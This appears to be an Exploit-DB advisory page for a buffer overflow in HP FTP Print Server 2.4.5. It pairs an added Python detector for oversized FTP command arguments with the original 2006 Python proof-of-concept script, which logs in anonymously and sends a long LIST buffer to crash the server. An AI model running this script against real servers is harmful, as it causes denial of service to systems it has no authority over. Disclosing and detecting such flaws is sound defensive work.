Vendor: FTP Print Server
By: Joxean Koret
CVSS: 7,5 (HIGH)
Type: Buffer Overflow
CWE: 120
Product Name: FTP Print Server
Affected Version From: 2.4.5
Affected Version To: 2.4.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:hewlett_packard:ftp_print_server:2.4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)

This is a proof of concept for a buffer overflow vulnerability (CWE-120) in Hewlett-Packard FTP Print Server Version 2.4.5. The vulnerability is triggered when a malicious user sends a specially crafted LIST command with a buffer of 3000 bytes or more; the PoC below does this after an anonymous login. The server then crashes and the connection is dropped.

Mitigation:

Upgrade to the latest version of the Hewlett-Packard FTP Print Server.
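
For detection alongside the upgrade, the following added example (not part of the original advisory or of Joxean Koret's PoC) inspects FTP control-channel command lines and flags an oversized, repetitive argument such as the LIST buffer described above. It applies the length check to every command rather than LIST alone; `MAX_ARG_LEN`, the function names and the sample capture are assumptions constructed for illustration.

```python
# Added example: flag FTP client commands whose argument is abnormally long.
# The advisory gives 3000 bytes; the PoC's own loop doubles "./A" nine times,
# i.e. 3 * 2**9 = 1536 bytes, so the limit must sit well below both figures.
MAX_ARG_LEN = 512  # assumed site policy, not a value from the advisory


def smallest_period(s):
    """Smallest p with s[i] == s[i + p] for every valid i (KMP prefix function)."""
    if not s:
        return 0
    pi, k = [0] * len(s), 0
    for i in range(1, len(s)):
        while k and s[i] != s[k]:
            k = pi[k - 1]
        if s[i] == s[k]:
            k += 1
        pi[i] = k
    return len(s) - pi[-1]


def inspect(line):
    """Classify one client command line from the FTP control channel."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append("oversized-argument")
        # A tiny unit repeated many times is filler, not a real path.
        if smallest_period(arg) * 8 <= len(arg):
            findings.append("repeated-filler")
    return {"verb": verb.upper(), "arg_len": len(arg), "findings": findings}


def scan(lines):
    """Return (line_number, result) for every command that raised a finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        result = inspect(line)
        if result["findings"]:
            hits.append((number, result))
    return hits


# Constructed control-channel capture (client side only).
SAMPLE = [
    "USER anonymous\r\n",
    "LIST /pub/drivers\r\n",
    "LIST " + "./A" * 512 + "\r\n",            # length the PoC loop produces
    "LIST " + ("./A" * 1024)[:3000] + "\r\n",  # length the advisory states
]

if __name__ == "__main__":
    for number, result in scan(SAMPLE):
        print(number, result)
```

The same check can run in an FTP-aware proxy or over control-channel logs; the 512-byte limit should be tuned to the longest legitimate path on the site.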

Exploit-DB raw data:

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

buf = "./A"
iMax = 9

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf[0:3000])
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

# milw0rm.com [2006-12-19]